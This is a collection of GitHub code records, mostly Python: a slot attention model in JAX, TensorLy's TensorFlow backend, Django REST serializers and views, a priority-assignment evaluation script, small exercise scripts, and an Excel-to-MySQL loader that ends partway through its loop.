+{"seq_id":"38064682600","text":"from data.classes.diplomat_viewable import DiplomatViewable\n\nclass Board(DiplomatViewable):\n\tdef __init__(self, name):\n\t\tnames = [name]\n\n\t\tsuper().__init__(names)\n\n\t\tself.loadables = {}\n\t\tself.nations = []\n\t\tself.territories = []\n\t\tself.units = []\n\t\tself.turn_number = 0\n\n\tdef view_string(self):\n\t\treturn_string = str(self) + ':\\nLoadables: ' + str(len(self.loadables)) + '\\nNations:'\n\t\tfor nation in self.nations:\n\t\t\treturn_string += ',\\t' + str(nation)\n\t\treturn_string += '\\nTerritories:'\n\t\tfor territory in self.territories:\n\t\t\treturn_string += ',\\t' + str(territory)\n\t\treturn_string += '\\nUnits:'\n\t\tfor unit in self.units:\n\t\t\treturn_string += ',\\t' + str(unit)\n\t\treturn return_string\n","repo_name":"Lakuna/Diplomat","sub_path":"data/classes/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"33456136868","text":"from typing import List\n\nclass Solution:\n def 
findAllConcatenatedWordsInADict(self, words: List[str]) -> List[str]:\n # sets have O(1) lookup compared to O(n) lookup for lists\n # can probably speed this up even further by caching isConcat calls \n # but this suffices\n swords = set(words)\n def isConcat(word):\n for i in range(1, len(word)):\n if word[:i] in swords:\n if word[i:] in swords or isConcat(word[i:]):\n return True\n return False\n \n out = []\n for word in words:\n if isConcat(word):\n out.append(word)\n return out","repo_name":"Corncycle/leetcode-solutions","sub_path":"concatenated-words.py","file_name":"concatenated-words.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44133688438","text":"'''Code adapted from https://github.com/google-research/slot-attention-video'''\n\"\"\"Slot Attention model for object discovery and set prediction.\"\"\"\nimport logging\nimport haiku as hk\nimport jax.numpy as jnp\nimport jax\nimport time\nimport optax\nimport os\nfrom slot_attention.sa_utils import load_model, newest\n\nclass SlotAttention(hk.Module):\n \"\"\"Slot Attention module.\"\"\"\n# rng_key: jax.interpreters.xla.DeviceArray\n\n def __init__(self, num_iterations, num_slots, slot_size, mlp_hidden_size,\n key, epsilon=1e-8):\n \"\"\"Builds the Slot Attention module.\n\n Args:\n num_iterations: Number of iterations.\n num_slots: Number of slots.\n slot_size: Dimensionality of slot feature vectors.\n mlp_hidden_size: Hidden layer size of MLP.\n epsilon: Offset for attention coefficients before normalization.\n \"\"\"\n super().__init__()\n self.num_iterations = num_iterations\n self.num_slots = num_slots\n self.slot_size = slot_size\n self.mlp_hidden_size = mlp_hidden_size\n self.epsilon = epsilon\n self.key = key\n self.norm_inputs = hk.LayerNorm(axis=-1, create_scale=True, create_offset=True)\n self.norm_slots = hk.LayerNorm(axis=-1, create_scale=True, create_offset=True)\n self.norm_mlp = hk.LayerNorm(axis=-1, create_scale=True, create_offset=True)\n\n # Parameters for Gaussian init (shared by all slots).\n mu_init = hk.initializers.VarianceScaling(1.0, \"fan_avg\", \"uniform\")\n self.slots_mu = mu_init(\n [1, 1, self.slot_size],\n jnp.float32)\n sigma_init = hk.initializers.VarianceScaling(1.0, \"fan_avg\", \"uniform\")\n self.slots_log_sigma = sigma_init(\n [1, 1, self.slot_size],\n jnp.float32)\n\n # Linear maps for the attention module.\n self.project_q = hk.Linear(self.slot_size, with_bias=False, name=\"q\")\n self.project_k = hk.Linear(self.slot_size, with_bias=False, name=\"k\")\n self.project_v = hk.Linear(self.slot_size, with_bias=False, name=\"v\")\n\n # Slot update functions.\n self.gru = hk.GRU(self.slot_size)\n self.mlp = hk.Sequential([\n hk.Linear(self.mlp_hidden_size),\n jax.nn.relu,\n hk.Linear(self.slot_size)\n ], name=\"mlp\")\n\n def __call__(self, inputs):\n # `inputs` has shape [batch_size, num_inputs, inputs_size].\n inputs = self.norm_inputs(inputs) # Apply layer norm to the input.\n k = self.project_k(inputs) # Shape: [batch_size, num_inputs, slot_size].\n v = self.project_v(inputs) # Shape: [batch_size, num_inputs, slot_size].\n\n # Initialize the slots. 
Shape: [batch_size, num_slots, slot_size].\n slots = self.slots_mu + jnp.exp(self.slots_log_sigma) * jax.random.normal(\n self.key, [jnp.shape(inputs)[0], self.num_slots, self.slot_size])\n\n # Multiple rounds of attention.\n for _ in range(self.num_iterations):\n slots_prev = slots\n slots = self.norm_slots(slots)\n\n # Attention.\n q = self.project_q(slots) # Shape: [batch_size, num_slots, slot_size].\n q *= self.slot_size ** -0.5 # Normalization.\n attn_logits = jnp.einsum('ijk,ihk->ijh', k, q)\n attn = jax.nn.softmax(attn_logits, axis=-1)\n # `attn` has shape: [batch_size, num_inputs, num_slots].\n\n # Weighted mean.\n attn += self.epsilon\n attn /= jnp.sum(attn, axis=-2, keepdims=True)\n updates = jnp.einsum('ijk,ijh->ikh', attn, v)\n # `updates` has shape: [batch_size, num_slots, slot_size].\n # Slot update.\n slots, encoded_state = hk.dynamic_unroll(self.gru,updates,self.gru.initial_state(updates.shape[0]),time_major=False)\n #slots, _ = self.gru(updates,self.gru.initial_state(updates.shape[0]))\n slots += self.mlp(self.norm_mlp(slots))\n\n return slots\n\n\ndef spatial_broadcast(slots, resolution):\n \"\"\"Broadcast slot features to a 2D grid and collapse slot dimension.\"\"\"\n # `slots` has shape: [batch_size, num_slots, slot_size].\n slots = jnp.reshape(slots, [-1, slots.shape[-1]])[:, None, None, :]\n grid = jnp.tile(slots, [1, resolution[0], resolution[1], 1])\n # `grid` has shape: [batch_size*num_slots, width, height, slot_size].\n return grid\n\n\ndef spatial_flatten(x):\n return jnp.reshape(x, [-1, x.shape[1] * x.shape[2], x.shape[-1]])\n\n\ndef unstack_and_split(x, batch_size, num_channels=3):\n \"\"\"Unstack batch dimension and split into channels and alpha mask.\"\"\"\n unstacked = jnp.reshape(x, [batch_size, -1] + list(x.shape)[1:])\n c1,c2,c3,masks = jnp.split(unstacked, unstacked.shape[-1], axis=-1)\n channels = jnp.concatenate([c1,c2,c3],axis=-1)\n return channels, masks\n\n\nclass SlotAttentionAutoEncoder(hk.Module):\n \"\"\"Slot Attention-based auto-encoder for object discovery.\"\"\"\n\n def __init__(self, resolution, num_slots, num_iterations, key):\n \"\"\"Builds the Slot Attention-based auto-encoder.\n\n Args:\n resolution: Tuple of integers specifying width and height of input image.\n num_slots: Number of slots in Slot Attention.\n num_iterations: Number of iterations in Slot Attention.\n \"\"\"\n super().__init__()\n self.resolution = resolution\n self.num_slots = num_slots\n self.num_iterations = num_iterations\n self.key = key\n self.encoder_cnn = hk.Sequential([\n hk.Conv2D(32, kernel_shape=5, padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2D(32, kernel_shape=5, padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2D(64, kernel_shape=5, padding=\"SAME\"),\n jax.nn.relu,\n ], name=\"encoder_cnn\")\n\n self.decoder_initial_size = (8, 8)\n self.decoder_cnn = hk.Sequential([\n hk.Conv2DTranspose(\n 64, 5, stride=(2, 2), padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2DTranspose(\n 32, 5, stride=(2, 2), padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2DTranspose(\n 32, 5, stride=(2, 2), padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2DTranspose(\n 32, 5, stride=(1, 1), padding=\"SAME\"),\n jax.nn.relu,\n hk.Conv2DTranspose(\n 4, 3, stride=(1, 1), padding=\"SAME\")\n ], name=\"decoder_cnn\")\n\n self.encoder_pos = SoftPositionEmbed(64, self.resolution)\n self.decoder_pos = SoftPositionEmbed(64, self.decoder_initial_size)\n\n self.layer_norm = hk.LayerNorm(axis=-1, create_scale=True, create_offset=True)\n self.mlp = hk.Sequential([\n hk.Linear(64),\n jax.nn.relu,\n hk.Linear(64)\n ], 
name=\"feedforward\")\n\n self.slot_attention = SlotAttention(\n num_iterations=self.num_iterations,\n num_slots=self.num_slots,\n slot_size=64,\n mlp_hidden_size=128,key=self.key)\n\n def __call__(self, image):\n # `image` has shape: [batch_size, width, height, num_channels].\n\n # Convolutional encoder with position embedding.\n x = self.encoder_cnn(image) # CNN Backbone.\n x = self.encoder_pos(x) # Position embedding.\n x = spatial_flatten(x) # Flatten spatial dimensions (treat image as set).\n x = self.mlp(self.layer_norm(x)) # Feedforward network on set.\n # `x` has shape: [batch_size, width*height, input_size].\n\n # Slot Attention module.\n slots = self.slot_attention(x)\n # `slots` has shape: [batch_size, num_slots, slot_size].\n\n # Spatial broadcast decoder.\n x = spatial_broadcast(slots, self.decoder_initial_size)\n # `x` has shape: [batch_size*num_slots, width_init, height_init, slot_size].\n x = self.decoder_pos(x)\n x = self.decoder_cnn(x)\n\n # `x` has shape: [batch_size*num_slots, width, height, num_channels+1].\n\n # Undo combination of slot and batch dimension; split alpha masks.\n recons, masks = unstack_and_split(x, batch_size=image.shape[0])\n # `recons` has shape: [batch_size, num_slots, width, height, num_channels].\n # `masks` has shape: [batch_size, num_slots, width, height, 1].\n\n # Normalize alpha masks over slots.\n masks = jax.nn.softmax(masks, axis=1)\n recon_combined = jnp.sum(recons * masks, axis=1) # Recombine image.\n # `recon_combined` has shape: [batch_size, width, height, num_channels].\n return recon_combined, recons, masks, slots\n\ndef build_grid(resolution):\n ranges = [jnp.linspace(0., 1., num=res) for res in resolution]\n grid = jnp.meshgrid(*ranges, sparse=False, indexing=\"ij\")\n grid = jnp.stack(grid, axis=-1)\n grid = jnp.reshape(grid, [resolution[0], resolution[1], -1])\n grid = jnp.expand_dims(grid, axis=0)\n grid = grid.astype(jnp.float32)\n return jnp.concatenate([grid, 1.0 - grid], axis=-1)\n\n\nclass SoftPositionEmbed():\n \"\"\"Adds soft positional embedding with learnable projection.\"\"\"\n\n def __init__(self, hidden_size, resolution):\n \"\"\"Builds the soft position embedding layer.\n\n Args:\n hidden_size: Size of input feature dimension.\n resolution: Tuple of integers specifying width and height of grid.\n \"\"\"\n super().__init__()\n self.dense = hk.Linear(hidden_size, with_bias=True)\n self.grid = build_grid(resolution)\n\n def __call__(self, inputs):\n return inputs + self.dense(self.grid)\n\n\nclass SlotAttentionModel:\n def __init__(self, args, key):\n '''Initialize Model'''\n self.resolution = (args.sa_resolution, args.sa_resolution)\n self.args = args\n self.optimizer_slots = optax.inject_hyperparams(optax.adam)(learning_rate=args.sa_learning_rate, eps_root=1e-8)\n self.network = self.build_forward_fn(key)\n self.train_slots = jax.jit(self.train_slots)\n\n def init_network(self, model_dir, key, batch, step_number=None):\n '''Build the Network'''\n if step_number is None:\n checkpoint = newest(model_dir)\n else:\n checkpoint = model_dir+f'{step_number}'\n if checkpoint is not None:\n print('Found Model')\n global_step = int(checkpoint.split('/')[-1])\n params = load_model(checkpoint)\n else:\n print('Training from Scratch')\n global_step = 0\n params = self.network.init(key, batch)\n optimizer_state = self.optimizer_slots.init(params)\n return params, optimizer_state, global_step\n\n def build_forward_fn(self, key) -> hk.Transformed:\n def forward_fn(batch):\n module = SlotAttentionAutoEncoder(self.resolution, 
self.args.sa_num_slots, self.args.sa_num_iterations, key)\n return module(batch)\n return hk.transform(forward_fn)\n\n def mse_loss(self, params, key, batch):\n preds = self.network.apply(params, key, batch)\n recon_combined, _, _, _ = preds\n loss = jnp.mean((recon_combined - batch)**2)\n return loss\n\n def train_slots(self, params, batch, key, optimizer_state):\n # Perform a single training step.\n loss, param_grads = jax.value_and_grad(self.mse_loss)(params, key, batch)\n updates, optimizer_state = self.optimizer_slots.update(param_grads, optimizer_state)\n params = optax.apply_updates(params, updates)\n return loss, params, optimizer_state\n","repo_name":"Somjit77/oc_gvfs","sub_path":"slot_attention/model_jax.py","file_name":"model_jax.py","file_ext":"py","file_size_in_byte":11497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32272580048","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\ntxt_file = open('allLanguagesUsed.txt', 'w')\nanos = [\"09\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\"]\nallLanguages = []\n\nfor ano in anos:\n url = \"https://www.go-hero.net/jam/\" + ano + \"/languages\"\n print(\"New request: \" + url)\n html = urllib.request.urlopen(url)\n soup = BeautifulSoup(html, \"html.parser\")\n table = soup.table\n\n for tr in table.find_all('tr')[1:]:\n lang = tr.td.text\n if lang not in allLanguages:\n allLanguages.append(lang)\n\n\nallLanguages.sort()\n\nfor l in allLanguages:\n txt_file.write(l + \"\\n\")\n","repo_name":"Tiaghoul/iic-GoogleJamStudy","sub_path":"findAllLanguages.py","file_name":"findAllLanguages.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35378561507","text":"try:\n import tensorflow as tf\n import tensorflow.math as tfm\n import tensorflow.experimental.numpy as tnp\nexcept ImportError as error:\n message = (\n \"Impossible to import TensorFlow.\\n\"\n \"To use TensorLy with the TensorFlow backend, \"\n \"you must first install TensorFlow!\"\n )\n raise ImportError(message) from error\n\nimport numpy as np\n\nfrom .core import Backend, backend_types, backend_basic_math, backend_array\n\n\nclass TensorflowBackend(Backend, backend_name=\"tensorflow\"):\n @staticmethod\n def context(tensor):\n return {\"dtype\": tensor.dtype}\n\n @staticmethod\n def tensor(data, dtype=np.float64, device=None, device_id=None):\n if isinstance(data, tf.Tensor) or isinstance(data, tf.Variable):\n return tf.cast(data, dtype=dtype)\n\n out = tf.Variable(data, dtype=dtype)\n return out.gpu(device_id) if device == \"gpu\" else out\n\n @staticmethod\n def is_tensor(tensor):\n return isinstance(tensor, tf.Tensor) or isinstance(tensor, tf.Variable)\n\n @staticmethod\n def to_numpy(tensor):\n if isinstance(tensor, np.ndarray):\n return tensor\n elif isinstance(tensor, tf.Tensor):\n return tensor.numpy()\n elif isinstance(tensor, tf.Variable):\n return tf.convert_to_tensor(tensor).numpy()\n else:\n return tensor\n\n @staticmethod\n def shape(tensor):\n return tuple(tensor.shape.as_list())\n\n @staticmethod\n def norm(tensor, order=2, axis=None):\n if order == \"inf\":\n order = np.inf\n return tf.norm(tensor=tensor, ord=order, axis=axis)\n\n @staticmethod\n def solve(lhs, rhs):\n squeeze = False\n if rhs.ndim == 1:\n squeeze = [-1]\n rhs = tf.reshape(rhs, (-1, 1))\n res = tf.linalg.solve(lhs, rhs)\n if squeeze:\n res = tf.squeeze(res, squeeze)\n return res\n\n @staticmethod\n def 
clip(tensor, a_min=None, a_max=None):\n return tnp.clip(tensor, a_min, a_max)\n\n @staticmethod\n def lstsq(a, b):\n n = a.shape[1]\n if tf.rank(b) == 1:\n x = tf.squeeze(tf.linalg.lstsq(a, tf.expand_dims(b, -1), fast=False), -1)\n else:\n x = tf.linalg.lstsq(a, b, fast=False)\n residuals = tf.norm(tf.tensordot(a, x, 1) - b, axis=0) ** 2\n return x, residuals if tf.linalg.matrix_rank(a) == n else tf.constant([])\n\n def svd(self, matrix, full_matrices):\n \"\"\"Correct for the atypical return order of tf.linalg.svd.\"\"\"\n S, U, V = tf.linalg.svd(matrix, full_matrices=full_matrices)\n return U, S, tf.transpose(a=V)\n\n def index_update(self, tensor, indices, values):\n if not isinstance(tensor, tf.Variable):\n tensor = tf.Variable(tensor)\n to_tensor = True\n else:\n to_tensor = False\n\n if isinstance(values, int):\n values = tf.constant(\n np.ones(self.shape(tensor[indices])) * values, **self.context(tensor)\n )\n\n tensor = tensor[indices].assign(values)\n\n if to_tensor:\n return tf.convert_to_tensor(tensor)\n else:\n return tensor\n\n @staticmethod\n def logsumexp(tensor, axis=0):\n return tfm.reduce_logsumexp(tensor, axis=axis)\n\n\n# Register numpy functions\nfor name in [\"nan\"]:\n TensorflowBackend.register_method(name, getattr(np, name))\n\n\n# Register linalg functions\nfor name in [\"diag\", \"qr\", \"eigh\", \"trace\"]:\n TensorflowBackend.register_method(name, getattr(tf.linalg, name))\n\n\n# Register tfm functions\nTensorflowBackend.register_method(\"digamma\", getattr(tfm, \"digamma\"))\n\n\n# Register tnp functions\nfor name in (\n backend_types\n + backend_basic_math\n + backend_array\n + [\n \"log2\",\n \"concatenate\",\n \"flip\",\n \"dot\",\n \"argmin\",\n \"argmax\",\n \"conj\",\n \"tensordot\",\n \"stack\",\n \"copy\",\n \"max\",\n \"sign\",\n \"mean\",\n \"sum\",\n \"moveaxis\",\n \"ndim\",\n \"arange\",\n \"sort\",\n \"argsort\",\n \"flip\",\n \"stack\",\n \"transpose\",\n ]\n):\n TensorflowBackend.register_method(name, getattr(tnp, name))\n","repo_name":"tensorly/tensorly","sub_path":"tensorly/backend/tensorflow_backend.py","file_name":"tensorflow_backend.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":1459,"dataset":"github-code","pt":"67"} +{"seq_id":"42406845631","text":"from rest_framework.serializers import ModelSerializer, HyperlinkedIdentityField, SerializerMethodField\n#from django.shortcuts import render\nfrom posts.models import Post\nfrom comments.models import Comment\nfrom comments.api.serializers import CommentListSerializer, CommentDetailSerializer\nfrom accounts.api.serializers import UserDetailSerializer\n#from rest_framework.request import Request\n\npost_detail_url = HyperlinkedIdentityField(view_name = 'posts-api:detail', lookup_field = 'slug',)# context={'request':request})\npost_update_url = HyperlinkedIdentityField(view_name = 'posts-api:update', lookup_field = 'slug',)\npost_delete_url = HyperlinkedIdentityField(view_name = 'posts-api:delete', lookup_field = 'slug',)\n\nclass PostListSerializer(ModelSerializer):\n\turl = post_detail_url\n\tuser = UserDetailSerializer(read_only=True)\n\tcomment_count = SerializerMethodField()\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = [\n\t\t\t\t\t'title',\n\t\t\t\t\t#'slug',\n\t\t\t\t\t'url',\n\t\t\t\t\t'content',\n\t\t\t\t\t'publish',\n\t\t\t\t\t#'id',\n\t\t\t\t\t'user',\n\t\t\t\t\t'comment_count',\n\t\t\t\t\t\t\t\t]\n\tdef get_user(self, obj):\n\t\treturn str(obj.user.username)\n\n\tdef get_comment_count(self, obj):\n\t\tcomment_queryset = 
Comment.objects.filter_by_instance(obj)\n\t\tparent_comment_count = comment_queryset.count()\n\t\treply_count = 0\n\t\tfor comment in comment_queryset:\n\t\t\t# only parent comments contribute replies\n\t\t\tif comment.is_parent:\n\t\t\t\treply_count += comment.children().count()\n\t\tcomment_count = parent_comment_count + reply_count\n\t\treturn comment_count\n\nclass PostDetailSerializer(ModelSerializer):\n\turl = post_detail_url\n\tupdate_url = post_update_url\n\tdelete_url = post_delete_url\n\tuser = UserDetailSerializer(read_only=True)\n\timage = SerializerMethodField()\n\thtml = SerializerMethodField()\n\t#comments = CommentDetailSerializer(comment_qs)\n\t#comments = SerializerMethodField()\n\tcomment_count = SerializerMethodField()\n\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = [\n\t\t\t\t\t'title',\n\t\t\t\t\t'slug',\n\t\t\t\t\t'url',\n\t\t\t\t\t'update_url',\n\t\t\t\t\t'delete_url',\n\t\t\t\t\t'image',\n\t\t\t\t\t'content',\n\t\t\t\t\t'html',\n\t\t\t\t\t'publish',\n\t\t\t\t\t'user',\n\t\t\t\t\t#'comments',\n\t\t\t\t\t'comment_count',\n\t\t\t\t\t#'id',\n\t\t\t\t\t\t\t\t\t]\n\n\tdef get_user(self, obj):\n\t\treturn str(obj.user.username)\n\n\tdef get_html(self, obj):\n\t\treturn obj.get_markdown()\t#defined in models\n\n\tdef get_image(self, obj):\n\t\ttry:\n\t\t\timage = obj.image.url\n\t\texcept:\n\t\t\timage = None\n\t\treturn image\n\n\tdef get_comments(self, obj):\n\t\t#content_type = obj.get_content_type\n\t\t#object_id = obj.id\n\t\tcomment_queryset = Comment.objects.filter_by_instance(obj)\n\t\tcomments = CommentListSerializer(comment_queryset, many=True).data\n\t\treturn comments\n\n\tdef get_comment_count(self, obj):\n\t\tcomment_queryset = Comment.objects.filter_by_instance(obj)\n\t\tparent_comment_count = comment_queryset.count()\n\t\treply_count = 0\n\t\tfor comment in comment_queryset:\n\t\t\t# only parent comments contribute replies\n\t\t\tif comment.is_parent:\n\t\t\t\treply_count += comment.children().count()\n\t\tcomment_count = parent_comment_count + reply_count\n\t\treturn comment_count\n\nclass PostCreateUpdateSerializer(ModelSerializer):\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = [\n\t\t\t\t\t'title',\n\t\t\t\t\t'content',\n\t\t\t\t\t'publish',\n\t\t\t\t\t\t\t\t\t]\n","repo_name":"Yobmod/dmldjangoREST","sub_path":"src/posts/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"28755313518","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_http_methods, require_safe, require_POST\nfrom .models import SampleModel\nfrom .forms import SampleModelForm\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n\n@require_safe\ndef index(request):\n forms = SampleModel.objects.order_by('pk')\n context = {\n 'forms': forms,\n }\n return render(request, 'community/index.html', context)\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef create(request):\n if request.method == 'POST': # create the article from the submitted data\n form = SampleModelForm(request.POST)\n if form.is_valid():\n article = form.save()\n return redirect('community:detail', article.pk)\n else: # send an empty form\n form = SampleModelForm()\n context = {\n 'form': form,\n }\n return render(request, 'community/create.html', context)\n\n@require_safe\ndef detail(request, pk):\n article = get_object_or_404(SampleModel, pk=pk)\n 
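# get_object_or_404 raises Http404 (rendered as a 404 page) when no SampleModel with this pk exists\n 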
context = {\n 'article': article\n }\n return render(request, 'community/detail.html', context)\n\n@login_required\n@require_POST\ndef delete(request, pk):\n if request.method == 'POST':\n article = get_object_or_404(SampleModel, pk=pk)\n article.delete()\n return redirect('community:index')\n\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef update(request, pk):\n article = get_object_or_404(SampleModel, pk=pk)\n if request.method == 'POST':\n form = SampleModelForm(request.POST, instance=article)\n if form.is_valid():\n form.save()\n return redirect('community:detail', article.pk)\n else:\n form = SampleModelForm(instance=article)\n context= {\n 'article': article,\n 'form': form,\n }\n return render(request, 'community/update.html', context)\n\n\n \n\n","repo_name":"gkska741/Studies","sub_path":"삼성소프트웨어아카데미/Django/project01/community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"69890060374","text":"from model import System\nfrom gradient import *\nfrom analysis import HolisticFPAnalysis, HolisticGlobalEDFAnalysis\nfrom assignment import PDAssignment, HOPAssignment, repr_priorities,EQFAssignment, EQSAssignment\nfrom vector import VectorHolisticFPBatchCosts, MappingPrioritiesMatrix, PrioritiesMatrix\nfrom evaluation import SchedRatioEval\nfrom examples import get_system\nfrom random import Random\nfrom fast_analysis import FastHolisticFPAnalysis\nfrom functools import partial\nimport generator\n\n\ndef gdpa(system: System) -> bool:\n analysis = HolisticFPAnalysis(limit_factor=10, reset=False)\n extractor = PriorityExtractor()\n cost_function = InvslackCost(extractor=extractor, analysis=analysis)\n stop_function = StandardStop(limit=100)\n delta_function = AvgSeparationDelta(factor=1.5)\n batch_cost_function = VectorHolisticFPBatchCosts(PrioritiesMatrix())\n gradient_function = StandardGradient(delta_function=delta_function,\n batch_cost_function=batch_cost_function)\n update_function = NoisyAdam()\n optimizer = StandardGradientDescent(extractor=extractor,\n cost_function=cost_function,\n stop_function=stop_function,\n gradient_function=gradient_function,\n update_function=update_function,\n verbose=False)\n\n pd = PDAssignment(normalize=True)\n pd.apply(system)\n optimizer.apply(system)\n analysis.apply(system)\n return system.is_schedulable()\n\n\ndef pd(system: System) -> bool:\n analysis = HolisticFPAnalysis(limit_factor=10, reset=False)\n pd = PDAssignment(normalize=True)\n pd.apply(system)\n analysis.apply(system)\n return system.is_schedulable()\n\n\ndef gdpa_mapping(system: System) -> bool:\n test = HolisticFPAnalysis(limit_factor=1, reset=True)\n analysis = HolisticFPAnalysis(limit_factor=10, reset=False)\n extractor = MappingPriorityExtractor()\n cost_function = InvslackCost(extractor=extractor, analysis=analysis)\n stop_function = StandardStop(limit=200)\n delta_function = AvgSeparationDelta(factor=1.5)\n batch_cost_function = VectorHolisticFPBatchCosts(MappingPrioritiesMatrix())\n gradient_function = StandardGradient(delta_function=delta_function,\n batch_cost_function=batch_cost_function)\n update_function = NoisyAdam(lr=1.5, beta1=0.9, beta2=0.999, epsilon=0.1, gamma=0.5)\n optimizer = StandardGradientDescent(extractor=extractor,\n cost_function=cost_function,\n stop_function=stop_function,\n gradient_function=gradient_function,\n update_function=update_function,\n verbose=False)\n\n pd = PDAssignment(normalize=True)\n 
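# warm-start with proportional-deadline (PD) priorities before the gradient-based optimizer refines them\n 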
pd.apply(system)\n optimizer.apply(system)\n\n test.apply(system)\n return system.is_schedulable()\n\n\nif __name__ == '__main__':\n # create population of examples\n rnd = Random(42)\n size = (3, 4, 3) # flows, tasks, procs\n n = 50\n systems = [get_system(size, rnd, balanced=False, name=str(i),\n deadline_factor_min=0.5,\n deadline_factor_max=1) for i in range(n)]\n\n # utilizations between 50 % and 90 %\n utilizations = np.linspace(0.5, 0.9, 20)\n\n tools = [(\"pd\", pd),\n (\"gdpa\", gdpa),\n (\"gdpa-mapping\", gdpa_mapping)]\n\n labels, funcs = zip(*tools)\n runner = SchedRatioEval(\"mapping(42)-unbalanced2\", labels=labels, funcs=funcs, systems=systems,\n utilizations=utilizations, threads=6,\n preprocessor=generator.unbalance, utilization_func=generator.set_system_utilization)\n runner.run()\n","repo_name":"rivasjm/pyrta","sub_path":"workspaces/mapping/mapping_eval.py","file_name":"mapping_eval.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"16575101126","text":"# Run with python3\n\nalphabets = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\nstring_input = input(\"Enter the string: \").upper()\n\nstring_output = \"\"\n\nfor i in range(len(string_input)):\n\tc = string_input[i]\n\tlocation = alphabets.find(c)\n\tif location == -1:\n\t\t# pass characters outside A-Z (spaces, digits, punctuation) through unchanged\n\t\tstring_output += c\n\t\tcontinue\n\tnew_location = (location + 13)%26\n\t#if new_location >= 26:\n\t#\tnew_location -= 26\n\tstring_output += alphabets[new_location]\n\nprint(\"Encrypted string: \",string_output)\n","repo_name":"neWbie-saby/Encryption-Methods","sub_path":"CAESARROT13.py","file_name":"CAESARROT13.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"16671949115","text":"# https://www.acmicpc.net/problem/2960\n\ndef get_primes(n, k):\n is_prime = [True] * (n + 1)\n is_prime[0] = False\n is_prime[1] = False\n cnt = 0\n for i in range(2, n + 1):\n for j in range(i, n + 1, i):\n if is_prime[j]:\n is_prime[j] = False\n cnt += 1\n if cnt == k:\n return j\n\n\n\nimport sys\ninput = sys.stdin.readline\nn, k = map(int, input().split())\nprint(get_primes(n, k))","repo_name":"kjh03160/Algorithm_Basic","sub_path":"practice/ETC/Erastotenes_2960.py","file_name":"Erastotenes_2960.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"14669583136","text":"import numpy as np\nimport torch\nfrom . import helper\nfrom .envs import make_vec_envs\n\n
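# evaluation helper: rolls out the policy with mean (deterministic) actions on\n# observation-normalized envs and averages episode returns over all evaluation episodes\n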
def evaluate(\n num_evals, \n uni_agent, \n ob_rms,\n env_name, \n init_robots,\n seed=1, \n device=None):\n\n eval_envs = make_vec_envs(env_name, init_robots, seed, None, device, ret=False, ob=True)\n vec_norm = helper.get_vec_normalize(eval_envs)\n \n if vec_norm is not None:\n vec_norm.eval()\n vec_norm.ob_rms = ob_rms\n\n # recorders\n eval_episode_rewards = []\n\n obs = eval_envs.reset()\n while True:\n with torch.no_grad():\n val, action, logp = uni_agent.uni_act(obs, mean_action=True)\n obs, rewards, done, infos = eval_envs.step(action)\n for info in infos:\n if 'episode' in info.keys():\n eval_episode_rewards.append(info['episode']['r'])\n # check\n if num_evals*len(init_robots) == len(eval_episode_rewards):\n break\n eval_envs.close()\n print(\"Evaluation done!\")\n return np.average(eval_episode_rewards)\n\n ","repo_name":"Caiyishuai/ModularEvoGym","sub_path":"examples/transformer_ppo/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"}
+{"seq_id":"42062926367","text":"import xlrd\nimport mysql.connector\nimport datetime\n\ndata = xlrd.open_workbook(\"20191128_Data Dump.xlsx\")\nloans_sheet = data.sheet_by_name(\"loans\")\n\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"increasecapital\",\n password=\"password\",\n database=\"loan_db\",\n)\n\n\ncursor = db.cursor()\n\n# Creating a database\n# cursor.execute(\"CREATE DATABASE loan_db\")\n\n# Creating tables in the database\n# cursor.execute(\n# \"CREATE TABLE loans (loan_date DATE, due_date DATE, loan_code BIGINT(20), loan_amount BIGINT(20), loan_status VARCHAR(50), customer_id BIGINT(20), customer_station VARCHAR(50))\"\n# )\n\n# cursor.execute(\"SHOW TABLES\")\n\n# for tb in cursor:\n# print(tb)\n\n# Create the INSERT INTO sql query\nquery = \"\"\"INSERT INTO loans (loan_date, due_date, loan_code, loan_amount, loan_status, customer_id, customer_station) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\"\"\n\nprint(loans_sheet.cell(1, 5).value)\n\nfor r in range(1, loans_sheet.nrows):\n 